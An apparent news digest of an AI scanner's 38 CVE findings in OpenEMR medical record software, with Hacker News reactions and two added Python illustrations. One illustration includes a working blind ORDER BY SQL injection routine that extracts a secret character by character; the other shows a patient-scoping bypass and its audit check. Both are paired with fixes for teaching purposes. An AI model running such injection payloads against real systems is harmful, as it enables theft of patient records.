AI uncovers 38 vulnerabilities in largest open source medical record software


TLDR

  • AISLE’s AI analyzer found 38 CVEs in OpenEMR in Q1 2026, including three critical flaws (two CVSS 10.0 SQL injections and a patient-scoping bypass in the FHIR API), across a codebase serving 200M patients.

Key Takeaways

  • OpenEMR is used by 100,000+ medical providers across 34 languages; it holds ONC certification under all 13 Privacy and Security criteria.
  • 38 CVEs in one quarter, versus 23 from a dedicated human audit in 2018; the AISLE findings account for more than half of all OpenEMR GitHub security advisories published in the period.
  • The two CVSS 10.0 findings were SQL injections: one in the Patient REST API _sort parameter, one in the Immunization module’s web UI. Both allowed a full database dump and potentially RCE.
  • A third critical flaw, CVE-2026-24487, was architectural: FhirCareTeamService never implemented the patient-scoping interface, so the patient filter was skipped and patient-scoped OAuth2 tokens returned care-team data for every patient in the system.
  • Fixes shipped in OpenEMR 8.0.0 within four weeks of first disclosure; AISLE PRO now runs at code-review stage to catch new vulnerabilities before merge.
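The _sort finding above is the classic ORDER BY injection: a sort field cannot be passed as a bound parameter, so it gets spliced into the SQL string, and an attacker who controls it can turn the result ordering into a blind oracle for any other table. The following is an added example, not OpenEMR’s code (OpenEMR is PHP; this is a language-neutral illustration in Python using an in-memory SQLite database with a constructed schema). It shows the vulnerable concatenation, an oracle that recovers a secret one character at a time through row ordering alone, and the allowlist fix; the `-field` descending convention follows the FHIR _sort syntax and is an assumption about the API’s input format.

```python
import sqlite3

# Constructed sample data (not OpenEMR's schema): a tiny patient table plus
# a second table standing in for "anything else in the database".
PATIENTS = [
    (1, "Alice", "1980-01-01"),
    (2, "Bob", "1975-05-05"),
    (3, "Carol", "1990-09-09"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patient (pid INTEGER, fname TEXT, dob TEXT)")
    conn.execute("CREATE TABLE secrets (token TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('api-secret')")
    conn.executemany("INSERT INTO patient VALUES (?, ?, ?)", PATIENTS)
    return conn


def list_patients_vulnerable(conn, sort):
    # VULNERABLE (hypothetical, mirrors the _sort bug class): identifiers cannot
    # be bound as parameters, so the caller-controlled field is concatenated.
    sql = f"SELECT pid, fname, dob FROM patient ORDER BY {sort}"
    return conn.execute(sql).fetchall()


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_"


def extract_secret(conn, max_len=32):
    """Recover secrets.token via the ORDER BY oracle, one character per position.

    The payload orders by dob when the guessed character is right and by pid
    otherwise; with this data dob-order puts Bob first, pid-order puts Alice
    first, so the first row's name leaks one bit per request.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = (
                f"(CASE WHEN (SELECT substr(token, {pos}, 1) FROM secrets) = '{ch}' "
                f"THEN dob ELSE pid END)"
            )
            rows = list_patients_vulnerable(conn, payload)
            if rows[0][1] == "Bob":
                recovered += ch
                break
        else:
            break  # no candidate matched: we are past the end of the token
    return recovered


# FIXED: map external sort keys to known columns; reject everything else.
SORT_COLUMNS = {"pid": "pid", "name": "fname", "dob": "dob"}


def list_patients_safe(conn, sort):
    direction, key = "ASC", sort
    if sort.startswith("-"):            # FHIR-style "-field" means descending
        direction, key = "DESC", sort[1:]
    column = SORT_COLUMNS.get(key)
    if column is None:
        raise ValueError(f"unsupported sort field: {sort!r}")
    sql = f"SELECT pid, fname, dob FROM patient ORDER BY {column} {direction}"
    return conn.execute(sql).fetchall()


def safe_rejects(conn, sort):
    """True if the hardened endpoint refuses the given sort value."""
    try:
        list_patients_safe(conn, sort)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", extract_secret(db))
    print("safe descending dob:", list_patients_safe(db, "-dob"))
```

Note that the oracle never needs an error message or a UNION: the only observable is which row comes first, which is why a sort parameter that "just orders results" still rates as a full database read. The fix interpolates only a value taken from the allowlist, never the caller’s string.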
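The CVE-2026-24487 finding above is not a missing `WHERE` clause but a missing declaration: the dispatcher applies the patient filter only to services that opt in via an interface, so a service that forgets to implement it silently serves every patient. The following is an added example, not OpenEMR’s code (OpenEMR is PHP; this is a Python sketch with constructed data and a hypothetical dispatcher). It shows the vulnerable and fixed service side by side and adds the check a maintainer would want in CI: a scan that flags any service for a FHIR patient-compartment resource that does not declare patient scoping.

```python
from dataclasses import dataclass
from typing import FrozenSet, Optional, Protocol, runtime_checkable

# Constructed sample rows (not OpenEMR's schema): care-team entries per patient.
CARE_TEAMS = [
    {"id": "ct-1", "patient": "p-100", "team": "Dr. Lee, RN Smith"},
    {"id": "ct-2", "patient": "p-200", "team": "Dr. Kaur"},
    {"id": "ct-3", "patient": "p-100", "team": "PT Alvarez"},
]


@dataclass(frozen=True)
class Token:
    scopes: FrozenSet[str]
    patient: Optional[str]  # patient bound to a patient/* scoped token


@runtime_checkable
class PatientScoped(Protocol):
    """Hypothetical opt-in interface: which column ties a row to a patient."""

    def patient_key(self) -> str: ...


class FhirCareTeamServiceVulnerable:
    resource = "CareTeam"

    def search(self, rows):
        return list(rows)  # returns everything; scoping is left to the dispatcher


class FhirCareTeamServiceFixed(FhirCareTeamServiceVulnerable):
    def patient_key(self) -> str:  # declaring the interface enables the filter
        return "patient"


def dispatch(service, token, rows=CARE_TEAMS):
    """Hypothetical request dispatcher: scope check, then opt-in patient filter."""
    needed = {f"patient/{service.resource}.read", f"user/{service.resource}.read"}
    if not needed & token.scopes:
        raise PermissionError("insufficient scope")
    results = service.search(rows)
    # The bug class: the filter runs ONLY if the service declared PatientScoped.
    if token.patient is not None and isinstance(service, PatientScoped):
        key = service.patient_key()
        results = [r for r in results if r[key] == token.patient]
    return results


# Partial list of FHIR R4 Patient-compartment resources (assumption: enough for
# the audit below; a real check would load the full compartment definition).
PATIENT_COMPARTMENT = {"Patient", "CareTeam", "Observation", "Condition",
                       "Encounter", "Immunization", "MedicationRequest"}


def unscoped_services(services):
    """Audit check: compartment resources whose service never opted into scoping."""
    return [s.resource for s in services
            if s.resource in PATIENT_COMPARTMENT and not isinstance(s, PatientScoped)]


if __name__ == "__main__":
    tok = Token(scopes=frozenset({"patient/CareTeam.read"}), patient="p-100")
    print("vulnerable:", [r["id"] for r in dispatch(FhirCareTeamServiceVulnerable(), tok)])
    print("fixed:     ", [r["id"] for r in dispatch(FhirCareTeamServiceFixed(), tok)])
    print("unscoped:  ", unscoped_services([FhirCareTeamServiceVulnerable()]))
```

The design lesson is that an opt-in interface fails open: the safe default is to deny patient-scoped tokens access to any compartment resource whose service has not declared how it scopes, and to fail the build when `unscoped_services` returns anything.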

Hacker News Comment Review

  • Commenters broadly agree all 38 findings fall into four well-known categories (SQLi, XSS, IDOR, path traversal), framing this as evidence AI scanners are effective at exhausting low-hanging fruit that human reviewers miss under time pressure.
  • Skepticism surfaced about AISLE’s credibility: one commenter flagged a prior AISLE blog post as misleading coattail-riding on Mythos, calling for more methodological detail on how findings were actually produced.
  • A practical concern running through the thread: most OpenEMR deployments are likely on older, unpatched versions, so the disclosed CVEs stay exploitable in production for the majority of affected providers regardless of upstream fix velocity.

Notable Comments

  • @simonw: notes every single finding maps to a known vuln class, calling it “a pretty good example of the value of AI security scanners” even on strong dev teams.
  • @mbesto: flags the real-world exposure gap: most providers running OpenEMR are likely on older versions where these CVEs are already public but unpatched.
  • @jjwiseman: questions AISLE’s credibility directly, citing a prior misleading blog post comparing it to Mythos as reason to want more detail on methodology.
